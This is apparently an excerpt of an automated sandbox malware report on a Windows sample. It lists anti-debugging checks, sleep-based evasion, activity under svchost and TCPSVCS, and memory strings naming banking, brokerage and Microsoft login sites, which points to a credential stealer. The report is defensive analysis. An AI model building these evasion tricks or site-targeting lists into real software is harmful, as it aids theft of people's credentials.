                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXEAPI coverage: 2.7 %
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep count: 256 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep time: -512000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep count: 9717 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE TID: 7928Thread sleep time: -19434000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rbYnBCIKTOmsBBqZTrkfQvmZnjXIhIJoAdbvplKOlT\HSxcaEmiOTH.exe TID: 7936Thread sleep time: -35000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\TCPSVCS.EXELast function: Thread delayed
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_00396CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00396CA9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003960DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003960DD
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003963F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003963F9
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0039EB60
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F56F FindFirstFileW,FindClose,0_2_0039F56F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0039F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0039F5FA
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1B2F
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003A1C8A
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_003A1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003A1F94
                Source: C:\Windows\SysWOW64\TCPSVCS.EXECode function: 5_2_0041C4E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0041C4E0
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exeCode function: 0_2_0036DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0036DDC0
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rs - HKVMware20,11696492231]
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 164U99.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 164U99.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 164U99.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: TCPSVCS.EXE, 00000005.00000002.2601089290.000000000073D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                Source: 164U99.5.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,1_O0
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 164U99.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 164U99.5.dr | Binary or memory string: discord.comVMware20,11696492231f
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ok.office365.comVMware20,1169649
                Source: TCPSVCS.EXE, 00000005.00000002.2606515922.00000000074C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: global block list test formVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 164U99.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 164U99.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 164U99.5.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 164U99.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 164U99.5.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: 164U99.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: HSxcaEmiOTH.exe, 00000006.00000002.2601860000.000000000112F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                Source: 164U99.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 164U99.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 164U99.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 164U99.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: firefox.exe, 00000008.00000002.1966826815.000001DB7FAAC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllLL
                Source: 164U99.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | API call chain: ExitProcess graph end node | graph_0-93448
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\TCPSVCS.EXE | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0377096E rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417713 LdrLoadDll
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_003A6AAF BlockInput
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00353D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00383920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_0036E01E LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00FDA018 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00FD89A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\xaqnaB0rcW.exe | Code function: 0_2_00FD9FB8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380634F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]2_2_037BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]2_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]2_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]2_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]2_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]2_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]2_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]2_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]2_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]2_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]2_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]2_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]2_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]2_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]2_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]2_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]2_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]2_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]2_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]2_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]2_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]2_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]2_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]2_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]2_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]2_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]2_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]2_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]2_2_03804500
